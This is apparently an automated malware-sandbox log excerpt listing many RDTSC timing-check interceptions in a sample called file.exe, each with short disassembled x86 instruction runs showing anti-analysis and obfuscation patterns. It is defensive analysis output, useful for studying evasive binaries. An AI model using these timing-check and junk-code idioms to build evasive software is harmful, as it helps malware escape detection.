                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3D46 second address: 6C3D90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pop ebx 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007F6254B873E8h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000014h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 jne 00007F6254B873E6h 0x0000002b push 00000000h 0x0000002d add ebx, dword ptr [ebp+122D20AEh] 0x00000033 push 00000000h 0x00000035 jmp 00007F6254B873ECh 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d push ebx 0x0000003e push ebx 0x0000003f pop ebx 0x00000040 pop ebx 0x00000041 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3D90 second address: 6C3D9A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F6254D230BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3D9A second address: 6C3DC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F6254B873F9h 0x00000010 popad 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C5E0D second address: 6C5E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A477 second address: 66A495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873F5h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF003 second address: 6BF009 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66A495 second address: 66A4B4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6254B873F5h 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C3F01 second address: 6C3F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C643A second address: 6C6454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254B873F5h 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C73BE second address: 6C73C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C73C2 second address: 6C740D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jp 00007F6254B873ECh 0x0000000f push 00000000h 0x00000011 stc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F6254B873E8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D1E70h], ebx 0x00000034 push eax 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C740D second address: 6C741B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007F6254D230B6h 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C75E8 second address: 6C75F6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F6254B873ECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C75F6 second address: 6C7613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 pushad 0x00000008 jng 00007F6254D230B6h 0x0000000e jo 00007F6254D230B6h 0x00000014 popad 0x00000015 jc 00007F6254D230BCh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C9381 second address: 6C938B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F6254B873E6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C938B second address: 6C93C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b pushad 0x0000000c mov edx, dword ptr [ebp+122D33EDh] 0x00000012 sub ax, EF8Fh 0x00000017 popad 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b mov bh, 8Bh 0x0000001d pop edi 0x0000001e push 00000000h 0x00000020 xor dword ptr [ebp+122D3315h], eax 0x00000026 stc 0x00000027 push eax 0x00000028 ja 00007F6254D230D0h 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F6254D230BEh 0x00000035 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C93C9 second address: 6C93CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CA584 second address: 6CA588 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C95A9 second address: 6C95AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB3E5 second address: 6CB3E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB3E9 second address: 6CB3ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB3ED second address: 6CB40C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6254D230C4h 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CF490 second address: 6CF4F9 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6254B873FDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F6254B873EFh 0x00000010 nop 0x00000011 mov bx, CCE6h 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F6254B873E8h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov ebx, dword ptr [ebp+122D20B4h] 0x00000039 xchg eax, esi 0x0000003a push esi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CF4F9 second address: 6CF518 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push ebx 0x0000000c jl 00007F6254D230BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D05CB second address: 6D05CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D05CF second address: 6D05D9 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6254D230B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D05D9 second address: 6D05DE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD426 second address: 6CD437 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jng 00007F6254D230B6h 0x00000010 pop edi 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CD437 second address: 6CD445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254B873EAh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE5D5 second address: 6CE5D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CE6C0 second address: 6CE6C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D14DB second address: 6D14E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D14E1 second address: 6D14E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6CB661 second address: 6CB667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D14E6 second address: 6D1594 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push eax 0x0000000f call 00007F6254B873E8h 0x00000014 pop eax 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 add dword ptr [esp+04h], 0000001Ah 0x00000021 inc eax 0x00000022 push eax 0x00000023 ret 0x00000024 pop eax 0x00000025 ret 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push ebp 0x0000002b call 00007F6254B873E8h 0x00000030 pop ebp 0x00000031 mov dword ptr [esp+04h], ebp 0x00000035 add dword ptr [esp+04h], 00000019h 0x0000003d inc ebp 0x0000003e push ebp 0x0000003f ret 0x00000040 pop ebp 0x00000041 ret 0x00000042 mov edi, dword ptr [ebp+122D3BC4h] 0x00000048 push 00000000h 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007F6254B873E8h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000018h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 mov dword ptr [ebp+1248A371h], esi 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F6254B873F8h 0x00000072 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D1594 second address: 6D15A7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6254D230BEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2738 second address: 6D273E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D273E second address: 6D2742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D171F second address: 6D174C instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6254B873E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b push eax 0x0000000c pushad 0x0000000d jp 00007F6254B873FCh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D2742 second address: 6D2767 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6254D230C9h 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6D174C second address: 6D1750 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 67944F second address: 679458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 679458 second address: 679488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007F6254B873E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F6254B873FFh 0x00000012 jmp 00007F6254B873F9h 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBC4F second address: 6DBC70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230BEh 0x00000009 popad 0x0000000a jc 00007F6254D230C2h 0x00000010 jp 00007F6254D230B6h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBD85 second address: 6DBD95 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6254B873E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBD95 second address: 6DBD99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DBD99 second address: 6DBDA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6254B873E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC036 second address: 6DC040 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6254D230B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6DC040 second address: 6DC046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E1C1D second address: 6E1C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E1CC5 second address: 6E1CE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jng 00007F6254B873EEh 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push edi 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop edi 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E1EA0 second address: 4FED4E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 xor dword ptr [esp], 1A3928C1h 0x0000000e cld 0x0000000f push dword ptr [ebp+122D0049h] 0x00000015 cmc 0x00000016 call dword ptr [ebp+122D1D6Bh] 0x0000001c pushad 0x0000001d pushad 0x0000001e mov dx, C5F3h 0x00000022 jmp 00007F6254D230C9h 0x00000027 popad 0x00000028 xor eax, eax 0x0000002a mov dword ptr [ebp+122D28ABh], edx 0x00000030 jns 00007F6254D230C0h 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jnc 00007F6254D230BCh 0x00000040 mov dword ptr [ebp+122D39A8h], eax 0x00000046 jmp 00007F6254D230C5h 0x0000004b mov esi, 0000003Ch 0x00000050 mov dword ptr [ebp+122D29EDh], ecx 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a or dword ptr [ebp+122D28ABh], edi 0x00000060 lodsw 0x00000062 jnl 00007F6254D230BDh 0x00000068 cmc 0x00000069 add eax, dword ptr [esp+24h] 0x0000006d jmp 00007F6254D230C1h 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 pushad 0x00000077 xor bx, 0D58h 0x0000007c jno 00007F6254D230B7h 0x00000082 popad 0x00000083 nop 0x00000084 push eax 0x00000085 push edx 0x00000086 jg 00007F6254D230B8h 0x0000008c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3215 second address: 6E321A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E321A second address: 6E3224 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6254D230B6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E3224 second address: 6E323A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873EFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9372 second address: 6E9386 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9386 second address: 6E9390 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F6254B873E6h 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BE74 second address: 66BE8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6254D230BEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BE8C second address: 66BE90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 66BE90 second address: 66BEAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254D230C7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8633 second address: 6E8654 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6254B873F6h 0x00000007 push edi 0x00000008 jnp 00007F6254B873E6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8654 second address: 6E8683 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 jmp 00007F6254D230C9h 0x0000000d ja 00007F6254D230C2h 0x00000013 jbe 00007F6254D230B6h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8683 second address: 6E868A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E868A second address: 6E8690 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E87ED second address: 6E87F4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E87F4 second address: 6E8802 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jnc 00007F6254D230B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8941 second address: 6E8945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8945 second address: 6E8962 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F6254D230C7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8962 second address: 6E8978 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6254B873F2h 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E8ACC second address: 6E8AEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230C5h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6E9229 second address: 6E922F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC546 second address: 6EC54C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC54C second address: 6EC555 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EC555 second address: 6EC599 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6254D230BFh 0x00000009 push edi 0x0000000a pop edi 0x0000000b jnp 00007F6254D230B6h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 jc 00007F6254D230F9h 0x0000001a pushad 0x0000001b push eax 0x0000001c pop eax 0x0000001d jmp 00007F6254D230C9h 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EF052 second address: 6EF05E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007F6254B873E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6EF05E second address: 6EF062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F076C second address: 6F077E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F6254B873F2h 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6F4C53 second address: 6F4C58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF902 second address: 6BF96E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F6254B873E8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 call 00007F6254B873F2h 0x00000029 mov ecx, dword ptr [ebp+122D2A98h] 0x0000002f pop ecx 0x00000030 mov edx, ebx 0x00000032 lea eax, dword ptr [ebp+12494626h] 0x00000038 nop 0x00000039 pushad 0x0000003a jmp 00007F6254B873EDh 0x0000003f push edi 0x00000040 pushad 0x00000041 popad 0x00000042 pop edi 0x00000043 popad 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 jp 00007F6254B873E8h 0x0000004d pushad 0x0000004e popad 0x0000004f rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF96E second address: 6BF974 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF974 second address: 6BF978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BF978 second address: 6BF97C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
